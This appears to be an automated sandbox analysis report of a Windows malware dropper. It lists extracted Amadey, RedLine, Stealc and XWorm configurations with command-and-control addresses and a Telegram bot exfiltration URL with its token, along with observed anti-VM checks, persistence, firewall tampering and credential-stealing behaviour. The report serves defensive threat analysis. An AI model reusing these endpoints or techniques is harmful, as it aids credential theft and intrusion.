Analysis
-
max time kernel
83s -
max time network
138s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-04-2024 04:34
Static task
static1
Behavioral task
behavioral1
Sample
6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe
Resource
win10v2004-20240419-en
Behavioral task
behavioral2
Sample
6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe
Resource
win11-20240426-en
Errors
General
-
Target
6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe
-
Size
1.8MB
-
MD5
b9b1e4b2d6a24099e21fe77067dd7098
-
SHA1
bc5b3fd64b2ad7215fb8176ab4022ec9c8b664b2
-
SHA256
6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350
-
SHA512
a183e65e7f8f50cbc952db6bcd1378d1d68604e355cec3c9cbd7e34acb350a883a3de42764de5cdd91675ca028aa9cd179f61bfb402f07a0af6368d3a351b5d5
-
SSDEEP
49152:O3/bnp8W4MEx3c5tOnhRcns+n5I8MXTeGTp6gg/VSmk:Ojnpzyx3c5Mzcv5I8MX6GTYSf
Malware Config
Extracted
amadey
4.20
http://193.233.132.139
-
install_dir
5454e6f062
-
install_file
explorta.exe
-
strings_key
c7a869c5ba1d72480093ec207994e2bf
-
url_paths
/sev56rkm/index.php
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
redline
Test1234
185.215.113.67:26260
Extracted
stealc
http://52.143.157.84
http://185.172.128.62
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
5.0
127.0.0.1:7000
91.92.252.220:7000
41.199.23.195:7000
saveclinetsforme68465454711991.publicvm.com:7000
bBT8anvIxhxDFmkf
-
Install_directory
%AppData%
-
install_file
explorer.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe family_xworm behavioral2/memory/5320-760-0x0000000000170000-0x0000000000182000-memory.dmp family_xworm -
Detect ZGRat V1 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3716-230-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1 C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_zgrat_v1 behavioral2/memory/4592-289-0x0000000000570000-0x0000000000630000-memory.dmp family_zgrat_v1 behavioral2/memory/7160-1287-0x0000019088870000-0x000001908C168000-memory.dmp family_zgrat_v1 behavioral2/memory/7160-1310-0x00000190A6940000-0x00000190A6A50000-memory.dmp family_zgrat_v1 behavioral2/memory/7160-1316-0x000001908DEA0000-0x000001908DEC4000-memory.dmp family_zgrat_v1 -
Glupteba payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5760-1061-0x0000000000400000-0x0000000001DFB000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
87SWjL22hQPaCpSfqo5grzwC.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 87SWjL22hQPaCpSfqo5grzwC.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe family_redline C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe family_redline behavioral2/memory/5024-253-0x00000000003F0000-0x0000000000442000-memory.dmp family_redline behavioral2/memory/4592-289-0x0000000000570000-0x0000000000630000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe family_redline behavioral2/memory/4548-352-0x0000000000480000-0x00000000004D2000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
Processes:
amert.exe1d10cce2fa.exechrosha.exeexplorta.exe87SWjL22hQPaCpSfqo5grzwC.exe6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exeexplorta.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1d10cce2fa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 87SWjL22hQPaCpSfqo5grzwC.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exerundll32.exeflow pid process 77 5744 rundll32.exe 115 6124 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid process 856 netsh.exe 6268 netsh.exe 3344 netsh.exe -
Checks BIOS information in registry 2 TTPs 15 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
87SWjL22hQPaCpSfqo5grzwC.exe6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exeexplorta.exeexplorta.exeInstall.exeamert.exechrosha.exe1d10cce2fa.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 87SWjL22hQPaCpSfqo5grzwC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 87SWjL22hQPaCpSfqo5grzwC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1d10cce2fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1d10cce2fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe -
Executes dropped EXE 37 IoCs
Processes:
explorta.exeamert.exe06e517567e.exe1d10cce2fa.exechrosha.exeexplorta.exeswiiiii.exealexxxxxxxx.exekeks.exetrf.exegold.exeNewB.exeISetup8.exejok.exeswiiii.exetoolspub1.exeu2i0.0.exelie.exefile300un.exerun.exe4767d2e713f2021e8fe856e3ea638b58.exeu2i0.3.exemstc.exeJsU0mIy1ntpEgKLvpkZIxeHv.exe0uGYhodtbvJDiZVw84LSAglJ.exewPMduSZ8juY1TDHBUix0ljLR.exe87SWjL22hQPaCpSfqo5grzwC.exeu1rs.0.exeBCeXl9xTBcqb6RTpV0ci0ClD.exeBCeXl9xTBcqb6RTpV0ci0ClD.exeBCeXl9xTBcqb6RTpV0ci0ClD.exeBCeXl9xTBcqb6RTpV0ci0ClD.exeBCeXl9xTBcqb6RTpV0ci0ClD.exerun.exeTSG0dxvUxIJDY4V4LguJj7eN.exeInstall.exeu1rs.3.exepid process 4904 explorta.exe 3164 amert.exe 3184 06e517567e.exe 1620 1d10cce2fa.exe 4288 chrosha.exe 1408 explorta.exe 1332 swiiiii.exe 4432 alexxxxxxxx.exe 5024 keks.exe 4592 trf.exe 4452 gold.exe 416 NewB.exe 3240 ISetup8.exe 4548 jok.exe 2344 swiiii.exe 5172 toolspub1.exe 5368 u2i0.0.exe 5540 lie.exe 5324 file300un.exe 5208 run.exe 5760 4767d2e713f2021e8fe856e3ea638b58.exe 5312 u2i0.3.exe 5320 mstc.exe 2296 JsU0mIy1ntpEgKLvpkZIxeHv.exe 5668 0uGYhodtbvJDiZVw84LSAglJ.exe 4128 wPMduSZ8juY1TDHBUix0ljLR.exe 5172 87SWjL22hQPaCpSfqo5grzwC.exe 5964 u1rs.0.exe 4876 BCeXl9xTBcqb6RTpV0ci0ClD.exe 3000 BCeXl9xTBcqb6RTpV0ci0ClD.exe 4000 BCeXl9xTBcqb6RTpV0ci0ClD.exe 5600 BCeXl9xTBcqb6RTpV0ci0ClD.exe 6040 BCeXl9xTBcqb6RTpV0ci0ClD.exe 6132 run.exe 2748 TSG0dxvUxIJDY4V4LguJj7eN.exe 5548 Install.exe 3172 u1rs.3.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
amert.exe1d10cce2fa.exechrosha.exeexplorta.exe6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exeexplorta.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine 1d10cce2fa.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine chrosha.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe Key opened \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Wine explorta.exe -
Loads dropped DLL 12 IoCs
Processes:
rundll32.exerundll32.exerun.exeRegAsm.exerundll32.exeBCeXl9xTBcqb6RTpV0ci0ClD.exeBCeXl9xTBcqb6RTpV0ci0ClD.exeBCeXl9xTBcqb6RTpV0ci0ClD.exeBCeXl9xTBcqb6RTpV0ci0ClD.exeBCeXl9xTBcqb6RTpV0ci0ClD.exerun.exepid process 5700 rundll32.exe 5744 rundll32.exe 5208 run.exe 32 RegAsm.exe 32 RegAsm.exe 6124 rundll32.exe 4876 BCeXl9xTBcqb6RTpV0ci0ClD.exe 3000 BCeXl9xTBcqb6RTpV0ci0ClD.exe 4000 BCeXl9xTBcqb6RTpV0ci0ClD.exe 5600 BCeXl9xTBcqb6RTpV0ci0ClD.exe 6040 BCeXl9xTBcqb6RTpV0ci0ClD.exe 6132 run.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\87SWjL22hQPaCpSfqo5grzwC.exe themida behavioral2/memory/5172-850-0x0000000140000000-0x000000014072B000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
explorta.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\1d10cce2fa.exe = "C:\\Users\\Admin\\1000017002\\1d10cce2fa.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\06e517567e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\06e517567e.exe" explorta.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
87SWjL22hQPaCpSfqo5grzwC.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 87SWjL22hQPaCpSfqo5grzwC.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
BCeXl9xTBcqb6RTpV0ci0ClD.exeBCeXl9xTBcqb6RTpV0ci0ClD.exedescription ioc process File opened (read-only) \??\D: BCeXl9xTBcqb6RTpV0ci0ClD.exe File opened (read-only) \??\F: BCeXl9xTBcqb6RTpV0ci0ClD.exe File opened (read-only) \??\D: BCeXl9xTBcqb6RTpV0ci0ClD.exe File opened (read-only) \??\F: BCeXl9xTBcqb6RTpV0ci0ClD.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 109 api.myip.com 111 api.myip.com 113 ipinfo.io 114 ipinfo.io 118 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000016001\06e517567e.exe autoit_exe -
Drops file in System32 directory 4 IoCs
Processes:
87SWjL22hQPaCpSfqo5grzwC.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy 87SWjL22hQPaCpSfqo5grzwC.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 87SWjL22hQPaCpSfqo5grzwC.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 87SWjL22hQPaCpSfqo5grzwC.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 87SWjL22hQPaCpSfqo5grzwC.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exeexplorta.exeamert.exe1d10cce2fa.exechrosha.exeexplorta.exe87SWjL22hQPaCpSfqo5grzwC.exepid process 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe 4904 explorta.exe 3164 amert.exe 1620 1d10cce2fa.exe 4288 chrosha.exe 1408 explorta.exe 5172 87SWjL22hQPaCpSfqo5grzwC.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
swiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exerun.exerun.exedescription pid process target process PID 1332 set thread context of 4012 1332 swiiiii.exe RegAsm.exe PID 4432 set thread context of 3716 4432 alexxxxxxxx.exe RegAsm.exe PID 4452 set thread context of 8 4452 gold.exe RegAsm.exe PID 2344 set thread context of 32 2344 swiiii.exe RegAsm.exe PID 5324 set thread context of 5500 5324 file300un.exe AddInProcess32.exe PID 5208 set thread context of 5992 5208 run.exe cmd.exe PID 6132 set thread context of 1212 6132 run.exe cmd.exe -
Drops file in Windows directory 3 IoCs
Processes:
6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exeamert.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\explorta.job 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe File created C:\Windows\Tasks\chrosha.job amert.exe File created C:\Windows\Tasks\biPxHmULFllsbMgnpt.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 6188 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3056 1332 WerFault.exe swiiiii.exe 4976 4432 WerFault.exe alexxxxxxxx.exe 4504 4452 WerFault.exe gold.exe 5404 5172 WerFault.exe toolspub1.exe 5496 3240 WerFault.exe ISetup8.exe 2864 2296 WerFault.exe JsU0mIy1ntpEgKLvpkZIxeHv.exe 6232 5964 WerFault.exe u1rs.0.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
toolspub1.exeu1rs.3.exeu2i0.3.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1rs.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1rs.3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u1rs.3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2i0.3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2i0.3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2i0.3.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exeu1rs.0.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u1rs.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u1rs.0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3740 schtasks.exe 3480 schtasks.exe 2248 schtasks.exe 7152 schtasks.exe 1264 schtasks.exe 6364 schtasks.exe 6096 schtasks.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
Install.exechrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133587524756945171" chrome.exe -
Modifies registry class 1 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3938118698-2964058152-2337880935-1000\{0CB1B6CF-2247-4B4D-895B-06D3A9DA2475} chrome.exe -
Processes:
keks.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 keks.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 keks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exeexplorta.exeamert.exechrome.exe1d10cce2fa.exechrosha.exeexplorta.exeRegAsm.exerundll32.exekeks.exetrf.exerun.exepowershell.exejok.exepid process 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe 1372 6ff71066514f9902a3764a55ad402c6e02a80664c2edfd33984f34a61852f350.exe 4904 explorta.exe 4904 explorta.exe 3164 amert.exe 3164 amert.exe 3712 chrome.exe 3712 chrome.exe 1620 1d10cce2fa.exe 1620 1d10cce2fa.exe 4288 chrosha.exe 4288 chrosha.exe 1408 explorta.exe 1408 explorta.exe 32 RegAsm.exe 32 RegAsm.exe 5744 rundll32.exe 5744 rundll32.exe 5744 rundll32.exe 5744 rundll32.exe 5744 rundll32.exe 5744 rundll32.exe 5024 keks.exe 5024 keks.exe 4592 trf.exe 4592 trf.exe 5208 run.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 4592 trf.exe 5208 run.exe 5208 run.exe 5744 rundll32.exe 5744 rundll32.exe 5744 rundll32.exe 5744 rundll32.exe 32 RegAsm.exe 32 RegAsm.exe 5824 powershell.exe 5824 powershell.exe 5824 powershell.exe 4548 jok.exe 4548 jok.exe 5024 keks.exe 5024 keks.exe 5024 keks.exe 5024 keks.exe 5024 keks.exe 5024 keks.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
run.exerun.exepid process 5208 run.exe 6132 run.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
chrome.exepid process 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exedescription pid process Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe Token: SeShutdownPrivilege 3712 chrome.exe Token: SeCreatePagefilePrivilege 3712 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
06e517567e.exechrome.exepid process 3184 06e517567e.exe 3184 06e517567e.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3712 chrome.exe 3184 06e517567e.exe 3712 chrome.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3712 chrome.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe 3184 06e517567e.exe -
